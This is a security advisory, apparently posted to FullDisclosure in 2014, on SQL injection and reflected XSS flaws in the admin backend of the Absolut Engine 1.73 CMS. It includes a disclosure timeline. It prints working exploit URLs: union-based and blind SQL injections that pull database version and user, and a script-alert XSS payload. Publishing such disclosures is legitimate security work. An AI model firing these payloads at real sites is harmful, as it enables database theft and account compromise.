Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v. 1.73 CMS Advisory ID: SROEADV-2014-08 Author: Steffen Rösemann Affected Software: CMS Absolut Engine v. 1.73 Vendor URL: http://www.absolutengine.com/ Vendor Status: solved CVE-ID: - ========================== Vulnerability Description: ========================== The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL injection vulnerabilities and a XSS vulnerability in its administrative backend. ================== Technical Details: ================== The following PHP-Scripts are prone to SQL injections: *managersection.php (via sectionID parameter):* *http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7§ionID=1* *Exploit Example:* *http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7§ionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+* *edituser.php (via userID parameter):* *http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3* *Exploit Example:* *http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+* *admin.php (via username parameter, BlindSQLInjection):* *http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7* *Exploit Example:* *http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7* *managerrelated.php (via title parameter):* *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title ={some_title}* *Exploit Example:* *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+* The last PHP-Script is as well vulnerable to a Reflecting XSS vulnerability. *Exploit Example:* *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E* Although this is a product which is not actively developed anymore, I think it is worth mentioning as the idea (of the lists) are to keep tracking (unknown) vulnerabilities in software products (but that is a personally point of view). Moreover, this product is still in use by some sites (!) and it is offered without a hint of its status. ========= Solution: ========= As the CMS is not actively developed, it shouldn't be used anymore. ==================== Disclosure Timeline: ==================== 29-Dec-2014 – found the vulnerability 29-Dec-2014 - informed the developers 29-Dec-2014 – release date of this security advisory [without technical details] 30-Dec-2014 – Vendor responded, won't patch vulnerabilities 30-Dec-2014 – release date of this security advisory 30-Dec-2014 – post on FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== http://www.absolutengine.com/ http://sroesemann.blogspot.de